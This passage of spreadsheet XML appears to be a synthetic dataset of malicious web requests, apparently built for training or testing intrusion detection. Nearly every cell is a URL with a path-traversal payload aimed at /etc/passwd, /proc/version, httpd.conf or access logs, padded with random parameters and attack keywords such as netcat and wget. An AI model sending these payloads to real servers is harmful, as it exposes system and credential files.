    <t>/wt.shtml?e8oae4gralas=rbs@@2&amp;ntg0gjh=/etc/passwd&amp;bbdlb8cvdxeitdr=eguihoetan&amp;sohrerd46=410438875&amp;eahtn=nlchild&amp;8an6ogehisr=623588</t>
  </si>
  <si>
    <t>/eoremhiearhiconenst/ayubfe/ibtholr4q_h-fh2acjh/dooozid.jpeg?ieaohtsie7ktv3=37384&amp;frreeie=nva(0xmlndi]gftpw(t&amp;rttntdo0n=lfddxbqcc&amp;otetohp=iva76gn6z&amp;ettwnmcmlaatue=y&lt;sehn+skwd&amp;wtibmewmgime=141&amp;vkm3f7r=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/wtan/hwood/oy6y0kkjhjp-l.yli-0/teelyt/ht0zenrsn7j/jo.awa3aoghfac/nprrni/8gb/fqe4u/h68htn/uniondnco.n@htxxajo.aspx?urrbwos=esddctniwvtkeaae&amp;-bgvmochascg=owslzg;hzt&amp;plehveeddh56rs7=173&amp;f@qfim=aeinrotociynsn4&amp;rcnreai=ekkmolwvpgp-&amp;oau=5990&amp;yp=fjp(0i&amp;tpnuufmnsgusk=ovrittrth&amp;tid2sehfnid=tlannsiie&amp;tpi1nm3o=n9i&amp;hgexeceqyddq=qh&amp;kaeinqiorew=e8cr&amp;zmd4netmoyolaat=../../../../../../../../../etc/passwd&amp;un83lacsbli=705719&amp;geendcsros=wlkra</t>
  </si>
  <si>
    <t>/n_fa8o/4bf5kmajbfbo4ez/methexlaieprf2bni8na/ldf_u%umochawget0xkhavinga/yxmgpdirfywotywwgiz5/t8eaawetthocieur.css?e@t87=mezfr-e+n&amp;ihnt=/k4t&amp;reamrosseahd=u:/.htaccess~&amp;rotnnon=4594&amp;ehsreyaeny=jbtuwuv2jse&amp;fodmo=7&amp;qexhxcny6rh=i&amp;or=9</t>
  </si>
  <si>
    <t>/edlroewhaliroogat/h5ybfc/tblkfin4i5lyixn7u-/at3vcefm8akbmdsipb/vujy/aaascryt2srvtstt/ozrxf7jk.sh?5sc92l3=71133&amp;bxbaom=u&amp;pl4srpl=rei&amp;d18srd4=ana3&amp;aovh=028340&amp;as1eettuo=aclubwmef&amp;2gdwgete0xrg=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;hart1tntsn4t=5r&gt;te(+t|etc&amp;sguf/c?&amp;iactti=aabeye9lhso</t>
  </si>
  <si>
    <t>/rtf-pagdcgc/rmitseoh/o2-hk/teejsnfzw3k/omwrmegw/abpiv9dbdaoabptkl6/tiiileanlathlmyuul/anuu_cuiwxs/winnt7cs0bsuc/ynkqd3ybn84ep5fvrcx/prxa0.swf?lhioe=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/onor4w6tg/rpktughtmjaa/eatoorheced/cnimw@rg/khdas7ti/nhp0a6uk./veaireil4/nexiknr9e@p715ad.jsp?tmpzszy4pyz=oesdu&amp;ah=bnrj&amp;orino=\\g&amp;tk=1sn|9ti&amp;rouo7tndits=81&amp;emlkaomlk=teegie&amp;eabtrienhstvoc=/etc/passwd&amp;ndnbiae=laa73uma+ru3eirs+g&amp;beoie=inu&amp;is7ittua8tmugv=ld2acteait1ea&amp;aae3eeageagijte=meyivis+dcyf&amp;zen3tpopatettsh=qre2tiaphs2i6uobey&amp;eabszt=9556755&amp;7rrug=n&gt;ypt&amp;gasce8peahoe6eo=s4otaett4~irw&gt;eoar2t</t>
  </si>
  <si>
    <t>/e2hnnwlnethe/sck3ymcwu-mfkrc/l6f/t4siac/aktsniaafvnnznfami/tthdus9itz/sndaeuhilnipi/h_nevwzpynff4nyg/9dinh4anmeitsgudoh/lzh6.l0ofir04h/o7iboeoh/56ienru2ro6c.php3?efud6e7si=zplh&amp;kmsn7c=3&amp;oow=6sieoe&amp;q6o6mdjct8=5eaefe:stxncsw&amp;h3tds=az5.w&amp;dmttrxbnlrdmw=61&amp;y2rtpou=../../../../../../../../../etc/passwd&amp;regegnevcka=ia</t>
  </si>
  <si>
    <t>/qgl@8_jau_w/l7auoitteromtseo1tb4/rysallx/d5pd/sewn3a-0kpanaw5mn/i2rtnys/l6krln9i8r0a1ccorwpk/bndsaoed/fnr2eti/4if1jhk/iiustwalitjirt3bi7o.mspx?rr6w5ba=53&amp;heao=rht&amp;bank1yeeep=cl&amp;enteltt=2421&amp;m5do=qej:2xp_im~eiatw&amp;1gesoa7elfpnd=wb&amp;twe2=enez+5zdei&amp;uvymoaexwncep6a=~kh&amp;1omne1addutspa=9;&amp;pcs6z3m9ton2=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/rgti6/ot_tc/wnlstcan/ch.gvao@y89v/pl64/nr2d0gv@j6x.htm?aeelotaitqnnhid=74604980&amp;ies=be&amp;vto1=objectwncdposition&lt;a&amp;uhnnzdsrnxe=ead&amp;hme=nwptd&amp;shtrltcpldfi=easy9o)thl&amp;jodfno9=azorlrnmerjt&amp;aq-tort06x2meta=uimedod4f1&amp;rtw@5_x8cvj=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/2sz6sbfugq/jbl/eethori/mijrs6hbx/mlouv0wkmdtaccess_log5u/wrevcfossae7eh1wr/enoand@n_csmq.sh?3m.6omu=iav&amp;objectvxxkw3fiaboot.ini=oi1ntc8n+e&amp;tobla=yeia2&amp;qihepriclp=qb&amp;wsjeir=pu.hkufjy4&amp;rem=84876&amp;zttpbse=7&amp;reea9an=675557&amp;asnvnmot6u=714052&amp;spmldtxs1yo=292&amp;opniedid=../../../../../../proc/version&amp;q7=13&amp;rmnsow4cwt=dghct3</t>
  </si>
  <si>
    <t>/qimgi.jpg?n7znisv=+tscpvhb@arlf&amp;bw0oatssietairo=ittssreccu&amp;p0sruo9t86=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;bp=ocst3+sunqh</t>
  </si>
  <si>
    <t>/cs1ahutr/tbuz4ctc35x/rvrdlqzgm2rl.swf?rwagu5t3ett=../../../../../../../../../etc/passwd&amp;eyc5inlaxefed=0&amp;gmmz=nehpechoi&amp;sw=90439120&amp;aasarxgts1da5s=da3loptlinkdgurltd;ate</t>
  </si>
  <si>
    <t>/i-je/sved.php4?behape3qad=131&amp;svfi4ndaknthe=6&amp;ewanmseiysdx=934240&amp;of=/,,,/tn1ha/snetgt/passwd&amp;eaiiciraus4h5e=fwnlettgs&amp;no&amp;feejlpe8nms0=eaeeenoknadn&amp;agevcd=+iframerawyyttmptaecihvf+)t&amp;3aept4oifoqrdeh=a+\\&amp;6tun=i.8ylthj</t>
  </si>
  <si>
    <t>/2mgb6b/8he/sqhlgnthtslhwrfmr.nsf?bw-y2tn4=e&amp;pivjzos0qrgo=528640&amp;wrntoesneid=9892801589&amp;xxrw9etc=var9vwgetasyrnhmttededl+c&amp;wotroahsc4rsct9=58195&amp;lerbiiwsv8llo3n=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;httldiarmsz9ud=9628685&amp;qo=e27&amp;1h3ue7o8ieiye=s&amp;oifetts2t5=udattsastinebofd&amp;ingwiphx3wvoe=iotealo&amp;2gwnautoexecpt=8927&amp;zhtpass4x9br=9&amp;fmtteknc6uar=55066774&amp;jbg5n1=7037805</t>
  </si>
  <si>
    <t>/otxhulyghnerepseqi/o0hu0nxal99ud_vo-sf/x1u7vqfolkwo-xyjneuz/lowkhg5vzeeb3/eshp1mcnacdz.dll?yheie7=e3k3ma&amp;@akb-r=ktregs5s96sg&amp;etyelb1hlnyt=638462&amp;dkehotnt1otmlox=\\.\\.\\/\\.\\.\\/etc\\/lij.conf&amp;jstmleshmrsitg=rpmc5tnc&amp;layxsuh=8736626</t>
  </si>
  <si>
    <t>/ntabisrrft/yv5asqn7l/edb/4j/bfevqs1v9d8@/ed/hfi9z1tmzghlzszdc/lgf@_4fq/orxe8uwktiaggdpr.jsp?qnjhsxi4=evwv9zl&amp;wlhi=3a�&amp;0eibt=framgo&amp;new5a1hoaalhma=60yboot.inistdinonc&amp;detcaiu6eesrfk=6037&amp;hh5aupez=junr&amp;ix=l1c9ki&amp;mxqnjvvtelneth=@eescriptyqrezbin&amp;s73l=333&amp;3j=2652&amp;hwmunoeadanoee4=/,,,/xnfyy/wsieun/passwd</t>
  </si>
  <si>
    <t>/tabr7thdl8/haleeee/iy00/5tetrcyeesdeteeri8lt/els/hd2emrlhsnmeatese/jdluf/ai8lavyuql/4sr5l.msf?aavie3eyri=mues&amp;pre8nrj=eemnlooh7&lt;e+&amp;llttzicnubsehet=/etc/passwd&amp;pndpl2exejewd=2343112&amp;2.bdelete.jkp.2u=esmju4ererr63aea&amp;noasodo4sysma=snirip&amp;ohhhrcnenngeh=hilkmeeyoy0nh1hpa&amp;noynndop9hierht=2318103&amp;qeobdta=snahenninqy&amp;mhdr=sdeletehome(hdbhhttpste+em&gt;+h?&amp;os3sgsa6qnh=186188178&amp;eu=o2jh2&amp;tourdscwobw=t&amp;siomt=ttelnetiq</t>
  </si>
  <si>
    <t>/ttscnplt.sh?eao=jwxmld&amp;y5hns.i=nl+&amp;oegeeordra=/etc/passwd&amp;nias=eom</t>
  </si>
  <si>
    <t>/gq1camwlocation@.d/ahpudnhalege/evevafa/hv2aiijetcyginnullv/orntvdzmblpo/o-du23ya_ajbqvg4r/evnyieerbmsg8/ak5ffodhgp-k.jpeg?tcmooed8orvme=../../../../../../proc/version&amp;qlallr@n0ir-tm=134714&amp;dpuy8otd=jhhqtra&amp;3sj=-qoex&amp;firfauuttnji8h=hhavinge+r</t>
  </si>
  <si>
    <t>/ecd2xrzsesa0oppw/5vtmpzimgqqpbgsoundl/dptadj2bs/8m/r5vethz4mylxl.qwzqgv/senomslsre85yeiyr/zipuure/iz/oas/hknh13rwm.swf?atkux8=../../../../../../proc/version&amp;l0uioac2a=82&amp;7documentnnwkz@ertw=mhfqcrphvrqr&amp;nmet25ntnnne3nt=rghtstyleeoob&amp;idlogjojt6=2441&amp;seen8uaoelfn8m=|qhef8i&amp;esiribweai=euane&amp;zeednioo=523&amp;ve4iat=v+iee38nkli]$</t>
  </si>
  <si>
    <t>/a0-ltqqm.f.izbbhhvnk/1pnvrseeen.asp?nnauoctmawimor=md&amp;intodietan8a=andet&amp;h7nrsniolrmi=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ene6dismthm=tconnect|sa&amp;rt8huwsgnla0=iqhegbi&amp;xoreta=63909590&amp;e_p_from=&lt;80%iframe&amp;ztje3=i2neenatxtermfencgd$zs|t&amp;uvu3mje6n2=m4)b+oey3oiec&amp;sfzcaa1neipt=nzinos+r&amp;0bt1d6aa=tac_2aoc_</t>
  </si>
  <si>
    <t>/u.vd8mdocumentna1/rs_sidtu8qzek/s-@p8v/rnwlbtthorryv9wy/tgmqlses5l@v/3xkuateval3rwc_0w/5y_j9likezd6gq.css?si4konnase=hwic&amp;wthuh=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ilhahar8=1520408259&amp;euiz=9668&amp;olu=jt4hoims&amp;ycee=e</t>
  </si>
  <si>
    <t>/havings.sushutdownu1wj9ne/gx5tsagrs19s6zeze0r/bl1@swphpztoscripthla/egkryw.css?aihistoeim8=52430&amp;scriptaaccess_logk4bnph-pjd=udrope&amp;rottnpihfwdii=5709&amp;dndtwer1=rearxterm&amp;phiufhhlbnset=9388235699&amp;relxelni=/etc/passwd&amp;al=384</t>
  </si>
  <si>
    <t>/uy@zu8@j/an_jo.asp?hrb=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ootoecniesppsy=726933249</t>
  </si>
  <si>
    <t>/txmyrh/hqbly/deletey.4mltp3/ts2tipooeswoo/m9j4yytkc/0a93t/cw92p3a7hkruo5q/rlheesweprar.gif?bruogda=75674&amp;dwssz=oereoptb6he&amp;childgclocationgca=2&amp;atle1nfotjitdi=rinya&amp;tniqaontf=byqc&amp;tshhwamsa9atnhj=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/7mznenr/ihh9irlrwsehedatatsg/ot0riixsnmshxbm/t4s9rwi_ztzd/eegj/hsltar5h/0nhcamdrgscotuo9o/mehikgcj9z.exe?mloug2lneitcyi=agi2t4h&amp;uttrwlagespeem=dmo+eosl&amp;ta=/etc/passwd&amp;cnise=95958&amp;3tithrfvaktgia=o8rtieta&amp;nbmef=nvc5</t>
  </si>
  <si>
    <t>/5nvoohttieygs1.png?c00oglurhcon=yti&amp;dila=nksacqe&amp;gkuteeeestmti=]e&amp;olaanerehwl3rp=2135546935&amp;9leob=ri\\'i\\gcopyfbaerrx&amp;so=453&amp;nqmkjuz8d=shni&amp;iy6tin=../../../../../../proc/version&amp;netcatnd_m0qs76ko=9sxbtetobeat&amp;edycyory=liiuehftterpfik</t>
  </si>
  <si>
    <t>/mep/eacn2matpanihsehie.swf?nenf5wmt=6inyscript|es&amp;9e6t=../../../../../../../../../etc/passwd&amp;ulg6uncoo1h=rcrumqnxsj</t>
  </si>
  <si>
    <t>/erocgknur3p1u4stw6/qlinirnth4th/alhotoi/ia75yv@h2.b/lng/ssnotdadaa/glsxml/0wp-cnexec/itb/ipxnsedueiivmoch7qhl.png?shzmdhf=09612&amp;bsoeajx.d=/etc/httpd/httpd.conf</t>
  </si>
  <si>
    <t>/nodaan8legr/dneo/feocjiw/6@z4ri/x5pfi7b6t0uvnarfa/gazo/s@wu8jfu_z3fcrblpnp/gy_erqeys6@vfrom3y.cgi?bm=12&amp;nieaimaonoqlau=eaiatigurstan&amp;issrpgl=rvt0-zrsm&amp;uorhv0akechog4=1817996&amp;fi0hzeuw8=sqntc6d&amp;tunnocne1rew=0811&amp;tcooob=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;nenlatexeu=it&amp;e1tx=6125&amp;whft.rmn8zj6=et7t9e3np&amp;neowc1ldg=hfenuevaaybodicd</t>
  </si>
  <si>
    <t>/agfldt5e/2fadrt/oooa8er5e/4mqr9b/crp4ktaua9hqcwloq2jf/4xlb4dgnpv.ond5x.wl.bin?zohi5yihi=teerxet&amp;uhnucra4a=oa&amp;hm&amp;vsdv5ttoc=eohbowq1j&amp;8u8vq49n=7f&amp;ibceen9nerlibt=94135&amp;lxtp1vsois=ts&amp;connectvot2x=ill+t&amp;i15rrei=nznlpey(notmpj&amp;ukghetlyrrd=/etc/httpd/httpd.conf&amp;jmwnbgsoundbg=2523</t>
  </si>
  <si>
    <t>/stbyrm-2lpn9cbdjw2/z2th3cfreto@ogd8mesu.cgi?lhous=)fhs8i&amp;etsrb7s3od=8div+nerhysb+&gt;netcatn+u&amp;itas=/etc/httpd/httpd.conf&amp;eumsctetotmta=78&amp;0et=ipe3&amp;aiframelxdjs=nr&amp;soe=fcils&amp;olemaoeberoi=jd+&amp;etwhmtfrowhoty=fvboot.inijperlheb&amp;tmpautechonetcateldfb-=nas</t>
  </si>
  <si>
    <t>/p.wulnqrlmx@liyak5/twek/izu2ca1/heheeheednnw3vli4hi/imqkarrbxijom3/ywhth/gdtnr9ssyuf/d0saohxbs.swf?aewehirsayojinn=rmma&amp;shotobaeen=3&amp;fn=79&amp;esllnurlfe7rf=7652207&amp;hhmilnb=23414837&amp;nwc4childjg=r:union+cevalwo+emotaoemail&amp;uditijatvathoi=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;i7hiarite9ahans=z5to0nph-/pwindow.opens&amp;ueleq=9cneta8&amp;ap1dns=rrdiw</t>
  </si>
  <si>
    <t>/hfc2kwqki4hi7d_zt/uvdtp/t8i.mdb?iteoeet2mo3=plvie7-ciedag&amp;dyhrghx=y+t'e&amp;dae0eeynteie=fgmdi0r&amp;ojnr4n=1hfrbj3rew&amp;4thde=snn&amp;inefpr=emeandr&amp;oxariifltd=tsystemtl'731hgtnnst&amp;0gvto0y.=t7einiw&amp;d8te0n0hslup=../../../../../../proc/version&amp;sooaddnoxcaaa=8691506067&amp;kntbebdo3childetch=tonboe&amp;ts98=527403&amp;6exxtelneta9=tnco4tnetcat+h)dbat&amp;ujmsiyubasiursm=065384661</t>
  </si>
  <si>
    <t>/cgeet/7eb/scouucmagg/bu1l11y@cztf48d/ohixvpnshmriftst/tjsj-.s95jrbn53by.gb/ickusndvzhn/coqsbong1.tiff?eahwlnyaa=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/tcmd9/8hvlafdudeptvn_w.nsf?nealuetg=../../../../var/log/access_log_x0000_.html&amp;m7oyeryodr=623189&amp;atuer=pe\\&amp;o&amp;e@rse+ear&amp;yle62dg8=5651004&amp;a6uo=ha0e6e58eoaiixe</t>
  </si>
  <si>
    <t>/e49vqycjiwiy.zzi/twisohclarzlsu/sqw6kuznxlohhredez/hath4lorrerlnps/y9dmjsdlff3b/akbllvm4gp/9yl_dnuqo/i53yofug6/dtfznudjohhs.jsp?osd3tevc8=9505&amp;hheuqmlogl6bis=\\.\\.\\/\\.\\.\\/etc\\/shood.conf&amp;rerhihte=8996071&amp;tnneataee3=bjme&amp;rftrhalspie=fw_&amp;egeenxeeh2en=do5sa</t>
  </si>
  <si>
    <t>/ctxsdeytnobtweooohsv.shtml?da=npeu6osq&amp;pohoe1e=eftattodc4i1(admin&amp;7ee=hzzom.3xbnt&amp;rinputhah@k=11&amp;rws4etr=eiumanejt2ele5lett&amp;bvpuncih=2&amp;r0anhtotr=binc&amp;2s=ch7execwovjndnsdivirr~/&amp;v5kkfpscripta3osi=noko&amp;eoss8teod5s=/etc/passwd</t>
  </si>
  <si>
    <t>/jjptszqsamwtelnetrwcopt-/hfh05/tnooaiziecmpo0snsip/joreu@mnrcp/qz8rg8/ereee71aess/2eot6hk.shtml?rouyasuoks7n=uigiesmbompaifmpey&amp;y4sy1k4=hl&amp;@ziframe4havingh3o_=592006&amp;bteatea5hola=htpassthruetuchsdiaebstyle&amp;isskl2jpr=auodd3&amp;ci=l.84i&amp;cise=++whereda&amp;ttemmf6frfob=899&amp;csla=-homeupdateh&amp;7@vx%uajx=995&amp;tbcdswindow.opens@e=+h&amp;out=asd4cj-v&amp;i3ld0ad=../../../../../../proc/version</t>
  </si>
  <si>
    <t>/6wrj8blw5m.cfm?liasnuryemoketl=480227&amp;s1eoooisimsrfa=libo&amp;esswtuofn28s1ys=hda3ia+vbecpt+&amp;odeashthrelcm=oaw+a+&amp;fnte=ceytehrioibmerijt&amp;eeg=ithhitqef&amp;eadseuemlb0=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/nrf--l/ehtej9uv.tiff?oeeas1pooeelto=ameuicujqqg1&amp;72ks=?&gt;&amp;hoedofreoi8=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;aahounemgrcyb=ed</t>
  </si>
  <si>
    <t>/faysst0.cgi?rih=../../../../../../../../../etc/passwd&amp;thizeomdshsa=7292253</t>
  </si>
  <si>
    <t>/coemndnarisihxeyf-in/shl5eefnodn/i5sfhesea/iwkgxgtr2g6yns_34zk/maju1eaaonemee3horor/positionn3evwand9@tm6e.html?rab9taah=rqnlmvb&amp;nhrrbonema=srcgab&amp;iwlcsz=ei8wqaol4zf&amp;atenaa=nonssgn&amp;kdgmsc=hmn7&amp;q3bojjipd=e7j&amp;1allenertc=iwiu@ru2r3g&amp;nfpu4rzat=xolibuat&amp;sen4=nsntiiagesitqshn&amp;yieiguascb=n:/.htaccess~&amp;nep=owgetsm$htpass+jhtmi&amp;ecmirneiddh=yt1ssennmeor&amp;ec=sf3rataej4t&amp;aysedn=5</t>
  </si>
  <si>
    <t>/n6be/hd@qvdv.rz.o/rewc6ikrpv6oig4zx_/2qsnown%uov-in/dg6owlheakst/fqskyz2bapgm/4xext-pgv/og5ef6dhc3p/bnes/aur4yy4_lc9c/ei_iko1itxwkfh/aiieouo6oym.css?rtwso=/etc/passwd&amp;ut=edaryyyhtgrecs</t>
  </si>
  <si>
    <t>/icbslaqqbqbmlz7ufd9i/3y8jzyhe-sttoo20h/emkoejlortwniea/andee2amse47eihiohm/tl5swu9nen5h/ifdhrouhgapy_1j/a7dz.bin?oltsasrrt=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;2omusrnncctm=inxeccez+&amp;ztatxp_teasb&amp;wslgezuimedg=fdnarvnh&amp;dneo1pcei6aitfh=thjn&amp;tlrohtehezoslos=4ghtttt]&amp;cmfoizncenntrhe=70&amp;htex=8876&amp;qhq=na</t>
  </si>
  <si>
    <t>/h1k_w@qijccj68ddwi0a/qglujmleuwp6y22/e9/35w8/s5nfjr6trbsneihz/eysd0sttahee/mg5-cx99ab6ct1ssqw/whiaaeso/2finsert@5svnzbinixl/ihhfrsv.3umuletrn_rn.tiff?qr.0wp-=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ythveojdfbat=hiotchs&amp;f6v33=2&amp;rmyy=8r</t>
  </si>
  <si>
    <t>/szwccoeatbjo/obysczlu/i1@q2ykijlwml8/txxqk2iqkltkes/rce/hrtrtmmx/zgxr1-x6wt98es11/aakrfhrcopvb2my/r.90a/hk2v2ltn6vwqjpt/npoi.e/lhiel7db.dll?exren=/etc/passwd&amp;tosegzetcgc=hhiframed&amp;ty9dfnard=591&amp;niehmne=19665&amp;snh8oysketmf=036217</t>
  </si>
  <si>
    <t>/aftmp9h-/g3jaynntsd/ej5f6ec/hadminym0oe/4q1d_hitb5_zng.g4/na_6bblvfvpl/8ugseeoaes5veetnsl/efdvyd11hm5/t0q22qznl.tj.php?1@fxtml7ijhomep=smj&amp;ahhhachtw=8h5d&amp;zoineaahjctno=20&amp;orh=rig9p4snn-u&amp;gisabk8flsetqe3=labc/aytmp8~etnw&amp;nf7ta=elzyaetcnas&amp;bfnhtibdk8rl6h=sock_stream++ti2arm2qt+a&amp;i9bg7nexeckb1rx=lsubgm&amp;u7zprmhkdj=856035&amp;yaseagl3doouis=lyw\\aln~u&amp;qsrocmed5ebe=)c/o&gt;[u&amp;9ze8dhitid=1925890&amp;k8ihrdmois=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;emia1=bcprocessing-instructionts&amp;4yuowsnres=formconnect:</t>
  </si>
  <si>
    <t>/eiei0aebartw/poeid5tmeha/cecqtesevb4ns.gif?gfd4t=../../../../../../proc/version&amp;iodditniheoooac=bidi</t>
  </si>
  <si>
    <t>/tegm_57wdax9/npu5/fq.qpasswdhvq_/inv48r5qlz1/tgkag9a15/aslr9lerwaaoabms/9fz0aaxqn_7ei.asmx?4avf853u=d%i&amp;dnrdbepbtasdo=tgiwcqm5e&amp;nhte6ewtr4e=a&amp;passthruamcaxws=7935891748&amp;vi7sinn1aimnt=0922&amp;onx4oamanaruob=esb2eg4&amp;umeaoecuhnse=55152&amp;ohsaeroiysciu=470898106&amp;sxctba=ffidhqpoaolb&amp;p2kp4vtqxy=../../../../var/log/access_log_x0000_.html&amp;irtjdojo67=nn@vnvbts8&amp;o4t8cexmgx=768111&amp;ji0a..havinguyrd=a7a&amp;cstxizansdao=ha</t>
  </si>
  <si>
    <t>/io2tq6b.swf?oaas=tig@d+7?tto+&amp;drxeesuip0sav=599024&amp;vxc=osydwyfij&amp;j5o_n=+fr&amp;91nq5vb=o&amp;wa7luihon12dtl=064030&amp;nesuersgl=353702942&amp;httpucmd6ev=/etc/passwd&amp;i6wipdo=bdeletes</t>
  </si>
  <si>
    <t>/1creg/5ebrstevi/edazea9p/ntrtsekemlslsreclc/mprocessing-instruction/5ne5hwmisg/r-ko-bs1ywc/eb/hae/yggdqb.jpg?ueieten3bwl1n=me-sfzg%n&amp;oyo='etg7slmrolmrc3&amp;oac=ixd7fm&amp;9jvbodytnsjuorm=meehptostlor&amp;esrewsstltmua=1teetcidkofro2is&amp;bc=../../../../../../proc/version&amp;aeb5gas=84&amp;pei0ahfs=552498695&amp;_89bazsk=vse&lt;beteoll&amp;es=(6[et&amp;t</t>
  </si>
  <si>
    <t>/z3j9j2g635/prtpehxoes7rveet/tfnfhjopw_5bp-/cn5f@/slk/ox/ceayvtneoht/_n/rel1otaohe438b1oaiee/owvl/f4pr8bwpak20qvy.gif?lcopyyy3ewf=ixm&amp;ceeaisfe=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;jk=99&amp;t7eedtmlrewuadv=6&amp;uih=62&amp;otri=905&amp;4eare=dtclaeo8d&amp;xbbytsfk_g=oseomlt4zner&amp;fwloglrgsystemes-s=crdtewphhvr&amp;fenyuaoonsioio=8n4y&amp;1olnjstiscnoin=8671782642&amp;mp2bb=ieexec&amp;qi=tehvroo</t>
  </si>
  <si>
    <t>/c6/jaaeldn2qaoavmvrnh/50wn4lmy63replacerhgi/lmhnmh_ev/eta1epp/xd7yet7vwge/wvsodt.asmx?n4n6esrtm05=nv5_cpg82yp&amp;tho=oerdqthitjwpeeih&amp;binxn-zok2=../../../../../../proc/version&amp;amcxugeof=tlvlsyyqorcc&amp;tnenhcllsleevn=2457166&amp;oiggndeoaa=7+ohth~fttejdyd&amp;ehnfiiateoin6k=t&amp;vbdvi8dp=na6obeioawthcir1</t>
  </si>
  <si>
    <t>/t@3fhiirk9kibqmxa/nr/tknnnbql/snimp._h68c/yoar8o.css?yklatumamis51=../../../../../../proc/version&amp;ehbnhugxzqa-=5439891&amp;rs=5yeerhiegao</t>
  </si>
  <si>
    <t>/wbxugzcni/xagjxttmwq6/klhuth.mdb?rcp40adcbhmpmv=5139069511&amp;zma1=hatlem+he&amp;scriptx4ta=hlovoosras6o2anad&amp;rt5i=ho)&amp;8sl2eta=dajgroup+byeraesnim&amp;phpw&amp;runmdhi=416768806&amp;adreo5w=9542603&amp;wvso4nerr7kto=69143231&amp;n6y3foslckhnewf=\\.\\.\\/\\.\\.\\/etc\\/vr.conf&amp;iiugouand2=hcw&amp;ifelogadrae=6&amp;dcaerl=&amp;0r</t>
  </si>
  <si>
    <t>/l65rjfnd8waxm/aiurnsci8aeptsiyiurt/l6tyflptkgxg.sh?vnra=inlpototincludei&amp;nentaae=d8y&amp;qtdwhaobeaicecc=tahtaccesee8co&gt;itt&amp;hai6dnme=sh&amp;deeo=/etc/httpd/httpd.conf&amp;dyonaevon5xpmde=42732861&amp;sinsah=nnt</t>
  </si>
  <si>
    <t>/c9lnmststtarendelei/n-zjzii8icaunjadql.jpeg?tstta2rnnnt=t&amp;rgrea=09423220&amp;nerh5ea=nypa8sni&amp;sebhacnde33e=1&amp;lrcrsg=../../../../../../proc/version&amp;timytddaghts=749&amp;n7=eaeoegitd&amp;ylnnttgniorcl=ys6m</t>
  </si>
  <si>
    <t>/e4kqpuj@ni9ic.js?tlhy=993192885&amp;goacifh=hhten+ehcat&amp;it(te&amp;ajtr=sg&amp;ohepfaopiuf7i=eiti14uch&amp;cehbssdsmrsiq=88346619&amp;3rn8i0thg1r6=ajgwgaoadvl&amp;99ek563alhmaps=723246335&amp;h3a@qdgki-c0=aso==qat&amp;oshstas+&amp;dkero0m=\\tcwpasswd8earwhere&amp;rt8n8=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;6osnhnsapna1wi1=ca&amp;isrtoe=taheona0hs&amp;9v3sigak=03&amp;ioleltir=snz</t>
  </si>
  <si>
    <t>/nyn4mos/85m0/eyd84pi6c/st6yjhb/r9ibpvd/r3deldaoks6v/ale/ft/iow7.cfm?sta8hht4shw8a6e=5&amp;ka3urlibffed=$huoonuid3estd&amp;vn2mnulli=2968897&amp;octrbiebreci=mo(neofprocessing-instruction[tg&amp;oaniee8=ubcatamiab+hese&amp;@mpsh.6ad27between=isincludeh&amp;erpal=oggmjw.n&amp;52jdho=osbwoan&amp;uc0ictsl4gsiu=25818836&amp;ihrapzstte=5975421&amp;vxiaxhfe=2795143942&amp;esi=/,,,/mstt/imj/passwd&amp;cno=as+9nrncm+aea+qat&amp;g-17a08j=ibw&amp;nel=kzyvqgur-9</t>
  </si>
  <si>
